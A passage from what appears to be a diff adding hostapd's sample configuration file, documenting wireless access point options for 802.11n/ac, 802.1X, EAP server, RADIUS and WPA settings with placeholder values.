1609+# default: 300 (i.e., 5 minutes) 1610+#ap_max_inactivity=300 1611+# 1612+# The inactivity polling can be disabled to disconnect stations based on 1613+# inactivity timeout so that idle stations are more likely to be disconnected 1614+# even if they are still in range of the AP. This can be done by setting 1615+# skip_inactivity_poll to 1 (default 0). 1616+#skip_inactivity_poll=0 1617+ 1618+# Disassociate stations based on excessive transmission failures or other 1619+# indications of connection loss. This depends on the driver capabilities and 1620+# may not be available with all drivers. 1621+#disassoc_low_ack=1 1622+ 1623+# Maximum allowed Listen Interval (how many Beacon periods STAs are allowed to 1624+# remain asleep). Default: 65535 (no limit apart from field size) 1625+#max_listen_interval=100 1626+ 1627+# WDS (4-address frame) mode with per-station virtual interfaces 1628+# (only supported with driver=nl80211) 1629+# This mode allows associated stations to use 4-address frames to allow layer 2 1630+# bridging to be used. 1631+#wds_sta=1 1632+ 1633+# If bridge parameter is set, the WDS STA interface will be added to the same 1634+# bridge by default. This can be overridden with the wds_bridge parameter to 1635+# use a separate bridge. 1636+#wds_bridge=wds-br0 1637+ 1638+# Start the AP with beaconing disabled by default. 1639+#start_disabled=0 1640+ 1641+# Client isolation can be used to prevent low-level bridging of frames between 1642+# associated stations in the BSS. By default, this bridging is allowed. 1643+#ap_isolate=1 1644+ 1645+# BSS Load update period (in BUs) 1646+# This field is used to enable and configure adding a BSS Load element into 1647+# Beacon and Probe Response frames. 1648+#bss_load_update_period=50 1649+ 1650+# Fixed BSS Load value for testing purposes 1651+# This field can be used to configure hostapd to add a fixed BSS Load element 1652+# into Beacon and Probe Response frames for testing purposes. The format is 1653+# <station count>:<channel utilization>:<available admission capacity> 1654+#bss_load_test=12:80:20000 1655+ 1656+##### IEEE 802.11n related configuration ###################################### 1657+ 1658+# ieee80211n: Whether IEEE 802.11n (HT) is enabled 1659+# 0 = disabled (default) 1660+# 1 = enabled 1661+# Note: You will also need to enable WMM for full HT functionality. 1662+# Note: hw_mode=g (2.4 GHz) and hw_mode=a (5 GHz) is used to specify the band. 1663+#ieee80211n=1 1664+ 1665+# ht_capab: HT capabilities (list of flags) 1666+# LDPC coding capability: [LDPC] = supported 1667+# Supported channel width set: [HT40-] = both 20 MHz and 40 MHz with secondary 1668+# channel below the primary channel; [HT40+] = both 20 MHz and 40 MHz 1669+# with secondary channel above the primary channel 1670+# (20 MHz only if neither is set) 1671+# Note: There are limits on which channels can be used with HT40- and 1672+# HT40+. Following table shows the channels that may be available for 1673+# HT40- and HT40+ use per IEEE 802.11n Annex J: 1674+# freq HT40- HT40+ 1675+# 2.4 GHz 5-13 1-7 (1-9 in Europe/Japan) 1676+# 5 GHz 40,48,56,64 36,44,52,60 1677+# (depending on the location, not all of these channels may be available 1678+# for use) 1679+# Please note that 40 MHz channels may switch their primary and secondary 1680+# channels if needed or creation of 40 MHz channel maybe rejected based 1681+# on overlapping BSSes. These changes are done automatically when hostapd 1682+# is setting up the 40 MHz channel. 1683+# Spatial Multiplexing (SM) Power Save: [SMPS-STATIC] or [SMPS-DYNAMIC] 1684+# (SMPS disabled if neither is set) 1685+# HT-greenfield: [GF] (disabled if not set) 1686+# Short GI for 20 MHz: [SHORT-GI-20] (disabled if not set) 1687+# Short GI for 40 MHz: [SHORT-GI-40] (disabled if not set) 1688+# Tx STBC: [TX-STBC] (disabled if not set) 1689+# Rx STBC: [RX-STBC1] (one spatial stream), [RX-STBC12] (one or two spatial 1690+# streams), or [RX-STBC123] (one, two, or three spatial streams); Rx STBC 1691+# disabled if none of these set 1692+# HT-delayed Block Ack: [DELAYED-BA] (disabled if not set) 1693+# Maximum A-MSDU length: [MAX-AMSDU-7935] for 7935 octets (3839 octets if not 1694+# set) 1695+# DSSS/CCK Mode in 40 MHz: [DSSS_CCK-40] = allowed (not allowed if not set) 1696+# 40 MHz intolerant [40-INTOLERANT] (not advertised if not set) 1697+# L-SIG TXOP protection support: [LSIG-TXOP-PROT] (disabled if not set) 1698+#ht_capab=[HT40-][SHORT-GI-20][SHORT-GI-40] 1699+ 1700+# Require stations to support HT PHY (reject association if they do not) 1701+#require_ht=1 1702+ 1703+# If set non-zero, require stations to perform scans of overlapping 1704+# channels to test for stations which would be affected by 40 MHz traffic. 1705+# This parameter sets the interval in seconds between these scans. Setting this 1706+# to non-zero allows 2.4 GHz band AP to move dynamically to a 40 MHz channel if 1707+# no co-existence issues with neighboring devices are found. 1708+#obss_interval=0 1709+ 1710+##### IEEE 802.11ac related configuration ##################################### 1711+ 1712+# ieee80211ac: Whether IEEE 802.11ac (VHT) is enabled 1713+# 0 = disabled (default) 1714+# 1 = enabled 1715+# Note: You will also need to enable WMM for full VHT functionality. 1716+# Note: hw_mode=a is used to specify that 5 GHz band is used with VHT. 1717+#ieee80211ac=1 1718+ 1719+# vht_capab: VHT capabilities (list of flags) 1720+# 1721+# vht_max_mpdu_len: [MAX-MPDU-7991] [MAX-MPDU-11454] 1722+# Indicates maximum MPDU length 1723+# 0 = 3895 octets (default) 1724+# 1 = 7991 octets 1725+# 2 = 11454 octets 1726+# 3 = reserved 1727+# 1728+# supported_chan_width: [VHT160] [VHT160-80PLUS80] 1729+# Indicates supported Channel widths 1730+# 0 = 160 MHz & 80+80 channel widths are not supported (default) 1731+# 1 = 160 MHz channel width is supported 1732+# 2 = 160 MHz & 80+80 channel widths are supported 1733+# 3 = reserved 1734+# 1735+# Rx LDPC coding capability: [RXLDPC] 1736+# Indicates support for receiving LDPC coded pkts 1737+# 0 = Not supported (default) 1738+# 1 = Supported 1739+# 1740+# Short GI for 80 MHz: [SHORT-GI-80] 1741+# Indicates short GI support for reception of packets transmitted with TXVECTOR 1742+# params format equal to VHT and CBW = 80Mhz 1743+# 0 = Not supported (default) 1744+# 1 = Supported 1745+# 1746+# Short GI for 160 MHz: [SHORT-GI-160] 1747+# Indicates short GI support for reception of packets transmitted with TXVECTOR 1748+# params format equal to VHT and CBW = 160Mhz 1749+# 0 = Not supported (default) 1750+# 1 = Supported 1751+# 1752+# Tx STBC: [TX-STBC-2BY1] 1753+# Indicates support for the transmission of at least 2x1 STBC 1754+# 0 = Not supported (default) 1755+# 1 = Supported 1756+# 1757+# Rx STBC: [RX-STBC-1] [RX-STBC-12] [RX-STBC-123] [RX-STBC-1234] 1758+# Indicates support for the reception of PPDUs using STBC 1759+# 0 = Not supported (default) 1760+# 1 = support of one spatial stream 1761+# 2 = support of one and two spatial streams 1762+# 3 = support of one, two and three spatial streams 1763+# 4 = support of one, two, three and four spatial streams 1764+# 5,6,7 = reserved 1765+# 1766+# SU Beamformer Capable: [SU-BEAMFORMER] 1767+# Indicates support for operation as a single user beamformer 1768+# 0 = Not supported (default) 1769+# 1 = Supported 1770+# 1771+# SU Beamformee Capable: [SU-BEAMFORMEE] 1772+# Indicates support for operation as a single user beamformee 1773+# 0 = Not supported (default) 1774+# 1 = Supported 1775+# 1776+# Compressed Steering Number of Beamformer Antennas Supported: 1777+# [BF-ANTENNA-2] [BF-ANTENNA-3] [BF-ANTENNA-4] 1778+# Beamformee's capability indicating the maximum number of beamformer 1779+# antennas the beamformee can support when sending compressed beamforming 1780+# feedback 1781+# If SU beamformer capable, set to maximum value minus 1 1782+# else reserved (default) 1783+# 1784+# Number of Sounding Dimensions: 1785+# [SOUNDING-DIMENSION-2] [SOUNDING-DIMENSION-3] [SOUNDING-DIMENSION-4] 1786+# Beamformer's capability indicating the maximum value of the NUM_STS parameter 1787+# in the TXVECTOR of a VHT NDP 1788+# If SU beamformer capable, set to maximum value minus 1 1789+# else reserved (default) 1790+# 1791+# MU Beamformer Capable: [MU-BEAMFORMER] 1792+# Indicates support for operation as an MU beamformer 1793+# 0 = Not supported or sent by Non-AP STA (default) 1794+# 1 = Supported 1795+# 1796+# VHT TXOP PS: [VHT-TXOP-PS] 1797+# Indicates whether or not the AP supports VHT TXOP Power Save Mode 1798+# or whether or not the STA is in VHT TXOP Power Save mode 1799+# 0 = VHT AP doesn't support VHT TXOP PS mode (OR) VHT STA not in VHT TXOP PS 1800+# mode 1801+# 1 = VHT AP supports VHT TXOP PS mode (OR) VHT STA is in VHT TXOP power save 1802+# mode 1803+# 1804+# +HTC-VHT Capable: [HTC-VHT] 1805+# Indicates whether or not the STA supports receiving a VHT variant HT Control 1806+# field. 1807+# 0 = Not supported (default) 1808+# 1 = supported 1809+# 1810+# Maximum A-MPDU Length Exponent: [MAX-A-MPDU-LEN-EXP0]..[MAX-A-MPDU-LEN-EXP7] 1811+# Indicates the maximum length of A-MPDU pre-EOF padding that the STA can recv 1812+# This field is an integer in the range of 0 to 7. 1813+# The length defined by this field is equal to 1814+# 2 pow(13 + Maximum A-MPDU Length Exponent) -1 octets 1815+# 1816+# VHT Link Adaptation Capable: [VHT-LINK-ADAPT2] [VHT-LINK-ADAPT3] 1817+# Indicates whether or not the STA supports link adaptation using VHT variant 1818+# HT Control field 1819+# If +HTC-VHTcapable is 1 1820+# 0 = (no feedback) if the STA does not provide VHT MFB (default) 1821+# 1 = reserved 1822+# 2 = (Unsolicited) if the STA provides only unsolicited VHT MFB 1823+# 3 = (Both) if the STA can provide VHT MFB in response to VHT MRQ and if the 1824+# STA provides unsolicited VHT MFB 1825+# Reserved if +HTC-VHTcapable is 0 1826+# 1827+# Rx Antenna Pattern Consistency: [RX-ANTENNA-PATTERN] 1828+# Indicates the possibility of Rx antenna pattern change 1829+# 0 = Rx antenna pattern might change during the lifetime of an association 1830+# 1 = Rx antenna pattern does not change during the lifetime of an association 1831+# 1832+# Tx Antenna Pattern Consistency: [TX-ANTENNA-PATTERN] 1833+# Indicates the possibility of Tx antenna pattern change 1834+# 0 = Tx antenna pattern might change during the lifetime of an association 1835+# 1 = Tx antenna pattern does not change during the lifetime of an association 1836+#vht_capab=[SHORT-GI-80][HTC-VHT] 1837+# 1838+# Require stations to support VHT PHY (reject association if they do not) 1839+#require_vht=1 1840+ 1841+# 0 = 20 or 40 MHz operating Channel width 1842+# 1 = 80 MHz channel width 1843+# 2 = 160 MHz channel width 1844+# 3 = 80+80 MHz channel width 1845+#vht_oper_chwidth=1 1846+# 1847+# center freq = 5 GHz + (5 * index) 1848+# So index 42 gives center freq 5.210 GHz 1849+# which is channel 42 in 5G band 1850+# 1851+#vht_oper_centr_freq_seg0_idx=42 1852+# 1853+# center freq = 5 GHz + (5 * index) 1854+# So index 159 gives center freq 5.795 GHz 1855+# which is channel 159 in 5G band 1856+# 1857+#vht_oper_centr_freq_seg1_idx=159 1858+ 1859+# Workaround to use station's nsts capability in (Re)Association Response frame 1860+# This may be needed with some deployed devices as an interoperability 1861+# workaround for beamforming if the AP's capability is greater than the 1862+# station's capability. This is disabled by default and can be enabled by 1863+# setting use_sta_nsts=1. 1864+#use_sta_nsts=0 1865+ 1866+##### IEEE 802.1X-2004 related configuration ################################## 1867+ 1868+# Require IEEE 802.1X authorization 1869+#ieee8021x=1 1870+ 1871+# IEEE 802.1X/EAPOL version 1872+# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL 1873+# version 2. However, there are many client implementations that do not handle 1874+# the new version number correctly (they seem to drop the frames completely). 1875+# In order to make hostapd interoperate with these clients, the version number 1876+# can be set to the older version (1) with this configuration value. 1877+#eapol_version=2 1878+ 1879+# Optional displayable message sent with EAP Request-Identity. The first \0 1880+# in this string will be converted to ASCII-0 (nul). This can be used to 1881+# separate network info (comma separated list of attribute=value pairs); see, 1882+# e.g., RFC 4284. 1883+#eap_message=hello 1884+#eap_message=hello\0networkid=netw,nasid=foo,portid=0,NAIRealms=example.com 1885+ 1886+# WEP rekeying (disabled if key lengths are not set or are set to 0) 1887+# Key lengths for default/broadcast and individual/unicast keys: 1888+# 5 = 40-bit WEP (also known as 64-bit WEP with 40 secret bits) 1889+# 13 = 104-bit WEP (also known as 128-bit WEP with 104 secret bits) 1890+#wep_key_len_broadcast=5 1891+#wep_key_len_unicast=5 1892+# Rekeying period in seconds. 0 = do not rekey (i.e., set keys only once) 1893+#wep_rekey_period=300 1894+ 1895+# EAPOL-Key index workaround (set bit7) for WinXP Supplicant (needed only if 1896+# only broadcast keys are used) 1897+eapol_key_index_workaround=0 1898+ 1899+# EAP reauthentication period in seconds (default: 3600 seconds; 0 = disable 1900+# reauthentication). 1901+#eap_reauth_period=3600 1902+ 1903+# Use PAE group address (01:80:c2:00:00:03) instead of individual target 1904+# address when sending EAPOL frames with driver=wired. This is the most common 1905+# mechanism used in wired authentication, but it also requires that the port 1906+# is only used by one station. 1907+#use_pae_group_addr=1 1908+ 1909+# EAP Re-authentication Protocol (ERP) authenticator (RFC 6696) 1910+# 1911+# Whether to initiate EAP authentication with EAP-Initiate/Re-auth-Start before 1912+# EAP-Identity/Request 1913+#erp_send_reauth_start=1 1914+# 1915+# Domain name for EAP-Initiate/Re-auth-Start. Omitted from the message if not 1916+# set (no local ER server). This is also used by the integrated EAP server if 1917+# ERP is enabled (eap_server_erp=1). 1918+#erp_domain=example.com 1919+ 1920+##### Integrated EAP server ################################################### 1921+ 1922+# Optionally, hostapd can be configured to use an integrated EAP server 1923+# to process EAP authentication locally without need for an external RADIUS 1924+# server. This functionality can be used both as a local authentication server 1925+# for IEEE 802.1X/EAPOL and as a RADIUS server for other devices. 1926+ 1927+# Use integrated EAP server instead of external RADIUS authentication 1928+# server. This is also needed if hostapd is configured to act as a RADIUS 1929+# authentication server. 1930+#eap_server=0 1931+ 1932+# Path for EAP server user database 1933+# If SQLite support is included, this can be set to "sqlite:/path/to/sqlite.db" 1934+# to use SQLite database instead of a text file. 1935+#eap_user_file=/etc/hostapd.eap_user 1936+ 1937+# CA certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS 1938+#ca_cert=/etc/hostapd.ca.pem 1939+ 1940+# Server certificate (PEM or DER file) for EAP-TLS/PEAP/TTLS 1941+#server_cert=/etc/hostapd.server.pem 1942+ 1943+# Private key matching with the server certificate for EAP-TLS/PEAP/TTLS 1944+# This may point to the same file as server_cert if both certificate and key 1945+# are included in a single file. PKCS#12 (PFX) file (.p12/.pfx) can also be 1946+# used by commenting out server_cert and specifying the PFX file as the 1947+# private_key. 1948+#private_key=/etc/hostapd.server.prv 1949+ 1950+# Passphrase for private key 1951+#private_key_passwd=secret passphrase 1952+ 1953+# Server identity 1954+# EAP methods that provide mechanism for authenticated server identity delivery 1955+# use this value. If not set, "hostapd" is used as a default. 1956+#server_id=server.example.com 1957+ 1958+# Enable CRL verification. 1959+# Note: hostapd does not yet support CRL downloading based on CDP. Thus, a 1960+# valid CRL signed by the CA is required to be included in the ca_cert file. 1961+# This can be done by using PEM format for CA certificate and CRL and 1962+# concatenating these into one file. Whenever CRL changes, hostapd needs to be 1963+# restarted to take the new CRL into use. 1964+# 0 = do not verify CRLs (default) 1965+# 1 = check the CRL of the user certificate 1966+# 2 = check all CRLs in the certificate path 1967+#check_crl=1 1968+ 1969+# TLS Session Lifetime in seconds 1970+# This can be used to allow TLS sessions to be cached and resumed with an 1971+# abbreviated handshake when using EAP-TLS/TTLS/PEAP. 1972+# (default: 0 = session caching and resumption disabled) 1973+#tls_session_lifetime=3600 1974+ 1975+# Cached OCSP stapling response (DER encoded) 1976+# If set, this file is sent as a certificate status response by the EAP server 1977+# if the EAP peer requests certificate status in the ClientHello message. 1978+# This cache file can be updated, e.g., by running following command 1979+# periodically to get an update from the OCSP responder: 1980+# openssl ocsp \ 1981+# -no_nonce \ 1982+# -CAfile /etc/hostapd.ca.pem \ 1983+# -issuer /etc/hostapd.ca.pem \ 1984+# -cert /etc/hostapd.server.pem \ 1985+# -url http://ocsp.example.com:8888/ \ 1986+# -respout /tmp/ocsp-cache.der 1987+#ocsp_stapling_response=/tmp/ocsp-cache.der 1988+ 1989+# Cached OCSP stapling response list (DER encoded OCSPResponseList) 1990+# This is similar to ocsp_stapling_response, but the extended version defined in 1991+# RFC 6961 to allow multiple OCSP responses to be provided. 1992+#ocsp_stapling_response_multi=/tmp/ocsp-multi-cache.der 1993+ 1994+# dh_file: File path to DH/DSA parameters file (in PEM format) 1995+# This is an optional configuration file for setting parameters for an 1996+# ephemeral DH key exchange. In most cases, the default RSA authentication does 1997+# not use this configuration. However, it is possible setup RSA to use 1998+# ephemeral DH key exchange. In addition, ciphers with DSA keys always use 1999+# ephemeral DH keys. This can be used to achieve forward secrecy. If the file 2000+# is in DSA parameters format, it will be automatically converted into DH 2001+# params. This parameter is required if anonymous EAP-FAST is used. 2002+# You can generate DH parameters file with OpenSSL, e.g., 2003+# "openssl dhparam -out /etc/hostapd.dh.pem 2048" 2004+#dh_file=/etc/hostapd.dh.pem 2005+ 2006+# OpenSSL cipher string 2007+# 2008+# This is an OpenSSL specific configuration option for configuring the default 2009+# ciphers. If not set, "DEFAULT:!EXP:!LOW" is used as the default. 2010+# See https://www.openssl.org/docs/apps/ciphers.html for OpenSSL documentation 2011+# on cipher suite configuration. This is applicable only if hostapd is built to 2012+# use OpenSSL. 2013+#openssl_ciphers=DEFAULT:!EXP:!LOW 2014+ 2015+# Fragment size for EAP methods 2016+#fragment_size=1400 2017+ 2018+# Finite cyclic group for EAP-pwd. Number maps to group of domain parameters 2019+# using the IANA repository for IKE (RFC 2409). 2020+#pwd_group=19 2021+ 2022+# Configuration data for EAP-SIM database/authentication gateway interface. 2023+# This is a text string in implementation specific format. The example 2024+# implementation in eap_sim_db.c uses this as the UNIX domain socket name for 2025+# the HLR/AuC gateway (e.g., hlr_auc_gw). In this case, the path uses "unix:" 2026+# prefix. If hostapd is built with SQLite support (CONFIG_SQLITE=y in .config), 2027+# database file can be described with an optional db=<path> parameter. 2028+#eap_sim_db=unix:/tmp/hlr_auc_gw.sock 2029+#eap_sim_db=unix:/tmp/hlr_auc_gw.sock db=/tmp/hostapd.db 2030+ 2031+# EAP-SIM DB request timeout 2032+# This parameter sets the maximum time to wait for a database request response. 2033+# The parameter value is in seconds. 2034+#eap_sim_db_timeout=1 2035+ 2036+# Encryption key for EAP-FAST PAC-Opaque values. This key must be a secret, 2037+# random value. It is configured as a 16-octet value in hex format. It can be 2038+# generated, e.g., with the following command: 2039+# od -tx1 -v -N16 /dev/random | colrm 1 8 | tr -d ' ' 2040+#pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f 2041+ 2042+# EAP-FAST authority identity (A-ID) 2043+# A-ID indicates the identity of the authority that issues PACs. The A-ID 2044+# should be unique across all issuing servers. In theory, this is a variable 2045+# length field, but due to some existing implementations requiring A-ID to be 2046+# 16 octets in length, it is strongly recommended to use that length for the 2047+# field to provid interoperability with deployed peer implementations. This 2048+# field is configured in hex format. 2049+#eap_fast_a_id=101112131415161718191a1b1c1d1e1f 2050+ 2051+# EAP-FAST authority identifier information (A-ID-Info) 2052+# This is a user-friendly name for the A-ID. For example, the enterprise name 2053+# and server name in a human-readable format. This field is encoded as UTF-8. 2054+#eap_fast_a_id_info=test server 2055+ 2056+# Enable/disable different EAP-FAST provisioning modes: 2057+#0 = provisioning disabled 2058+#1 = only anonymous provisioning allowed 2059+#2 = only authenticated provisioning allowed 2060+#3 = both provisioning modes allowed (default) 2061+#eap_fast_prov=3 2062+ 2063+# EAP-FAST PAC-Key lifetime in seconds (hard limit) 2064+#pac_key_lifetime=604800 2065+ 2066+# EAP-FAST PAC-Key refresh time in seconds (soft limit on remaining hard 2067+# limit). The server will generate a new PAC-Key when this number of seconds 2068+# (or fewer) of the lifetime remains. 2069+#pac_key_refresh_time=86400 2070+ 2071+# EAP-SIM and EAP-AKA protected success/failure indication using AT_RESULT_IND 2072+# (default: 0 = disabled). 2073+#eap_sim_aka_result_ind=1 2074+ 2075+# Trusted Network Connect (TNC) 2076+# If enabled, TNC validation will be required before the peer is allowed to 2077+# connect. Note: This is only used with EAP-TTLS and EAP-FAST. If any other 2078+# EAP method is enabled, the peer will be allowed to connect without TNC. 2079+#tnc=1 2080+ 2081+# EAP Re-authentication Protocol (ERP) - RFC 6696 2082+# 2083+# Whether to enable ERP on the EAP server. 2084+#eap_server_erp=1 2085+ 2086+##### IEEE 802.11f - Inter-Access Point Protocol (IAPP) ####################### 2087+ 2088+# Interface to be used for IAPP broadcast packets 2089+#iapp_interface=eth0 2090+ 2091+ 2092+##### RADIUS client configuration ############################################# 2093+# for IEEE 802.1X with external Authentication Server, IEEE 802.11 2094+# authentication with external ACL for MAC addresses, and accounting 2095+ 2096+# The own IP address of the access point (used as NAS-IP-Address) 2097+own_ip_addr=127.0.0.1 2098+ 2099+# NAS-Identifier string for RADIUS messages. When used, this should be unique 2100+# to the NAS within the scope of the RADIUS server. Please note that hostapd 2101+# uses a separate RADIUS client for each BSS and as such, a unique 2102+# nas_identifier value should be configured separately for each BSS. This is 2103+# particularly important for cases where RADIUS accounting is used 2104+# (Accounting-On/Off messages are interpreted as clearing all ongoing sessions 2105+# and that may get interpreted as applying to all BSSes if the same 2106+# NAS-Identifier value is used.) For example, a fully qualified domain name 2107+# prefixed with a unique identifier of the BSS (e.g., BSSID) can be used here. 2108+# 2109+# When using IEEE 802.11r, nas_identifier must be set and must be between 1 and 2110+# 48 octets long. 2111+# 2112+# It is mandatory to configure either own_ip_addr or nas_identifier to be 2113+# compliant with the RADIUS protocol. When using RADIUS accounting, it is 2114+# strongly recommended that nas_identifier is set to a unique value for each 2115+# BSS. 2116+#nas_identifier=ap.example.com 2117+ 2118+# RADIUS client forced local IP address for the access point 2119+# Normally the local IP address is determined automatically based on configured 2120+# IP addresses, but this field can be used to force a specific address to be 2121+# used, e.g., when the device has multiple IP addresses. 2122+#radius_client_addr=127.0.0.1 2123+ 2124+# RADIUS authentication server 2125+#auth_server_addr=127.0.0.1 2126+#auth_server_port=1812 2127+#auth_server_shared_secret=secret 2128+ 2129+# RADIUS accounting server 2130+#acct_server_addr=127.0.0.1 2131+#acct_server_port=1813 2132+#acct_server_shared_secret=secret 2133+ 2134+# Secondary RADIUS servers; to be used if primary one does not reply to 2135+# RADIUS packets. These are optional and there can be more than one secondary 2136+# server listed. 2137+#auth_server_addr=127.0.0.2 2138+#auth_server_port=1812 2139+#auth_server_shared_secret=secret2 2140+# 2141+#acct_server_addr=127.0.0.2 2142+#acct_server_port=1813 2143+#acct_server_shared_secret=secret2 2144+ 2145+# Retry interval for trying to return to the primary RADIUS server (in 2146+# seconds). RADIUS client code will automatically try to use the next server 2147+# when the current server is not replying to requests. If this interval is set, 2148+# primary server will be retried after configured amount of time even if the 2149+# currently used secondary server is still working. 2150+#radius_retry_primary_interval=600 2151+ 2152+ 2153+# Interim accounting update interval 2154+# If this is set (larger than 0) and acct_server is configured, hostapd will 2155+# send interim accounting updates every N seconds. Note: if set, this overrides 2156+# possible Acct-Interim-Interval attribute in Access-Accept message. Thus, this 2157+# value should not be configured in hostapd.conf, if RADIUS server is used to 2158+# control the interim interval. 2159+# This value should not be less 600 (10 minutes) and must not be less than 2160+# 60 (1 minute). 2161+#radius_acct_interim_interval=600 2162+ 2163+# Request Chargeable-User-Identity (RFC 4372) 2164+# This parameter can be used to configure hostapd to request CUI from the 2165+# RADIUS server by including Chargeable-User-Identity attribute into 2166+# Access-Request packets. 2167+#radius_request_cui=1 2168+ 2169+# Dynamic VLAN mode; allow RADIUS authentication server to decide which VLAN 2170+# is used for the stations. This information is parsed from following RADIUS 2171+# attributes based on RFC 3580 and RFC 2868: Tunnel-Type (value 13 = VLAN), 2172+# Tunnel-Medium-Type (value 6 = IEEE 802), Tunnel-Private-Group-ID (value 2173+# VLANID as a string). Optionally, the local MAC ACL list (accept_mac_file) can 2174+# be used to set static client MAC address to VLAN ID mapping. 2175+# 0 = disabled (default) 2176+# 1 = option; use default interface if RADIUS server does not include VLAN ID 2177+# 2 = required; reject authentication if RADIUS server does not include VLAN ID 2178+#dynamic_vlan=0 2179+ 2180+# Per-Station AP_VLAN interface mode 2181+# If enabled, each station is assigned its own AP_VLAN interface. 2182+# This implies per-station group keying and ebtables filtering of inter-STA 2183+# traffic (when passed through the AP). 2184+# If the sta is not assigned to any VLAN, then its AP_VLAN interface will be 2185+# added to the bridge given by the "bridge" configuration option (see above). 2186+# Otherwise, it will be added to the per-VLAN bridge. 2187+# 0 = disabled (default) 2188+# 1 = enabled 2189+#per_sta_vif=0 2190+ 2191+# VLAN interface list for dynamic VLAN mode is read from a separate text file. 2192+# This list is used to map VLAN ID from the RADIUS server to a network 2193+# interface. Each station is bound to one interface in the same way as with 2194+# multiple BSSIDs or SSIDs. Each line in this text file is defining a new 2195+# interface and the line must include VLAN ID and interface name separated by 2196+# white space (space or tab). 2197+# If no entries are provided by this file, the station is statically mapped 2198+# to <bss-iface>.<vlan-id> interfaces. 2199+#vlan_file=/etc/hostapd.vlan 2200+ 2201+# Interface where 802.1q tagged packets should appear when a RADIUS server is 2202+# used to determine which VLAN a station is on. hostapd creates a bridge for 2203+# each VLAN. Then hostapd adds a VLAN interface (associated with the interface 2204+# indicated by 'vlan_tagged_interface') and the appropriate wireless interface 2205+# to the bridge. 2206+#vlan_tagged_interface=eth0 2207+ 2208+# Bridge (prefix) to add the wifi and the tagged interface to. This gets the 2209+# VLAN ID appended. It defaults to brvlan%d if no tagged interface is given 2210+# and br%s.%d if a tagged interface is given, provided %s = tagged interface 2211+# and %d = VLAN ID. 2212+#vlan_bridge=brvlan 2213+ 2214+# When hostapd creates a VLAN interface on vlan_tagged_interfaces, it needs 2215+# to know how to name it. 2216+# 0 = vlan<XXX>, e.g., vlan1 2217+# 1 = <vlan_tagged_interface>.<XXX>, e.g. eth0.1 2218+#vlan_naming=0 2219+ 2220+# Arbitrary RADIUS attributes can be added into Access-Request and 2221+# Accounting-Request packets by specifying the contents of the attributes with 2222+# the following configuration parameters. There can be multiple of these to 2223+# add multiple attributes. These parameters can also be used to override some 2224+# of the attributes added automatically by hostapd. 2225+# Format: <attr_id>[:<syntax:value>] 2226+# attr_id: RADIUS attribute type (e.g., 26 = Vendor-Specific) 2227+# syntax: s = string (UTF-8), d = integer, x = octet string 2228+# value: attribute value in format indicated by the syntax 2229+# If syntax and value parts are omitted, a null value (single 0x00 octet) is 2230+# used. 2231+# 2232+# Additional Access-Request attributes 2233+# radius_auth_req_attr=<attr_id>[:<syntax:value>] 2234+# Examples: 2235+# Operator-Name = "Operator" 2236+#radius_auth_req_attr=126:s:Operator 2237+# Service-Type = Framed (2) 2238+#radius_auth_req_attr=6:d:2 2239+# Connect-Info = "testing" (this overrides the automatically generated value) 2240+#radius_auth_req_attr=77:s:testing 2241+# Same Connect-Info value set as a hexdump 2242+#radius_auth_req_attr=77:x:74657374696e67 2243+ 2244+# 2245+# Additional Accounting-Request attributes 2246+# radius_acct_req_attr=<attr_id>[:<syntax:value>] 2247+# Examples: 2248+# Operator-Name = "Operator" 2249+#radius_acct_req_attr=126:s:Operator 2250+ 2251+# Dynamic Authorization Extensions (RFC 5176) 2252+# This mechanism can be used to allow dynamic changes to user session based on 2253+# commands from a RADIUS server (or some other disconnect client that has the 2254+# needed session information). For example, Disconnect message can be used to 2255+# request an associated station to be disconnected. 2256+# 2257+# This is disabled by default. Set radius_das_port to non-zero UDP port 2258+# number to enable. 2259+#radius_das_port=3799 2260+# 2261+# DAS client (the host that can send Disconnect/CoA requests) and shared secret 2262+#radius_das_client=192.168.1.123 shared secret here 2263+# 2264+# DAS Event-Timestamp time window in seconds 2265+#radius_das_time_window=300 2266+# 2267+# DAS require Event-Timestamp 2268+#radius_das_require_event_timestamp=1 2269+# 2270+# DAS require Message-Authenticator 2271+#radius_das_require_message_authenticator=1 2272+ 2273+##### RADIUS authentication server configuration ############################## 2274+ 2275+# hostapd can be used as a RADIUS authentication server for other hosts. This 2276+# requires that the integrated EAP server is also enabled and both 2277+# authentication services are sharing the same configuration. 2278+ 2279+# File name of the RADIUS clients configuration for the RADIUS server. If this 2280+# commented out, RADIUS server is disabled. 2281+#radius_server_clients=/etc/hostapd.radius_clients 2282+ 2283+# The UDP port number for the RADIUS authentication server 2284+#radius_server_auth_port=1812 2285+ 2286+# The UDP port number for the RADIUS accounting server 2287+# Commenting this out or setting this to 0 can be used to disable RADIUS 2288+# accounting while still enabling RADIUS authentication. 2289+#radius_server_acct_port=1813 2290+ 2291+# Use IPv6 with RADIUS server (IPv4 will also be supported using IPv6 API) 2292+#radius_server_ipv6=1 2293+ 2294+ 2295+##### WPA/IEEE 802.11i configuration ########################################## 2296+ 2297+# Enable WPA. Setting this variable configures the AP to require WPA (either 2298+# WPA-PSK or WPA-RADIUS/EAP based on other configuration). For WPA-PSK, either 2299+# wpa_psk or wpa_passphrase must be set and wpa_key_mgmt must include WPA-PSK. 2300+# Instead of wpa_psk / wpa_passphrase, wpa_psk_radius might suffice. 2301+# For WPA-RADIUS/EAP, ieee8021x must be set (but without dynamic WEP keys), 2302+# RADIUS authentication server must be configured, and WPA-EAP must be included 2303+# in wpa_key_mgmt. 2304+# This field is a bit field that can be used to enable WPA (IEEE 802.11i/D3.0) 2305+# and/or WPA2 (full IEEE 802.11i/RSN): 2306+# bit0 = WPA 2307+# bit1 = IEEE 802.11i/RSN (WPA2) (dot11RSNAEnabled) 2308+#wpa=1 2309+ 2310+# WPA pre-shared keys for WPA-PSK. This can be either entered as a 256-bit 2311+# secret in hex format (64 hex digits), wpa_psk, or as an ASCII passphrase 2312+# (8..63 characters) that will be converted to PSK. This conversion uses SSID 2313+# so the PSK changes when ASCII passphrase is used and the SSID is changed. 2314+# wpa_psk (dot11RSNAConfigPSKValue) 2315+# wpa_passphrase (dot11RSNAConfigPSKPassPhrase) 2316+#wpa_psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef 2317+#wpa_passphrase=secret passphrase 2318+ 2319+# Optionally, WPA PSKs can be read from a separate text file (containing list 2320+# of (PSK,MAC address) pairs. This allows more than one PSK to be configured. 2321+# Use absolute path name to make sure that the files can be read on SIGHUP 2322+# configuration reloads. 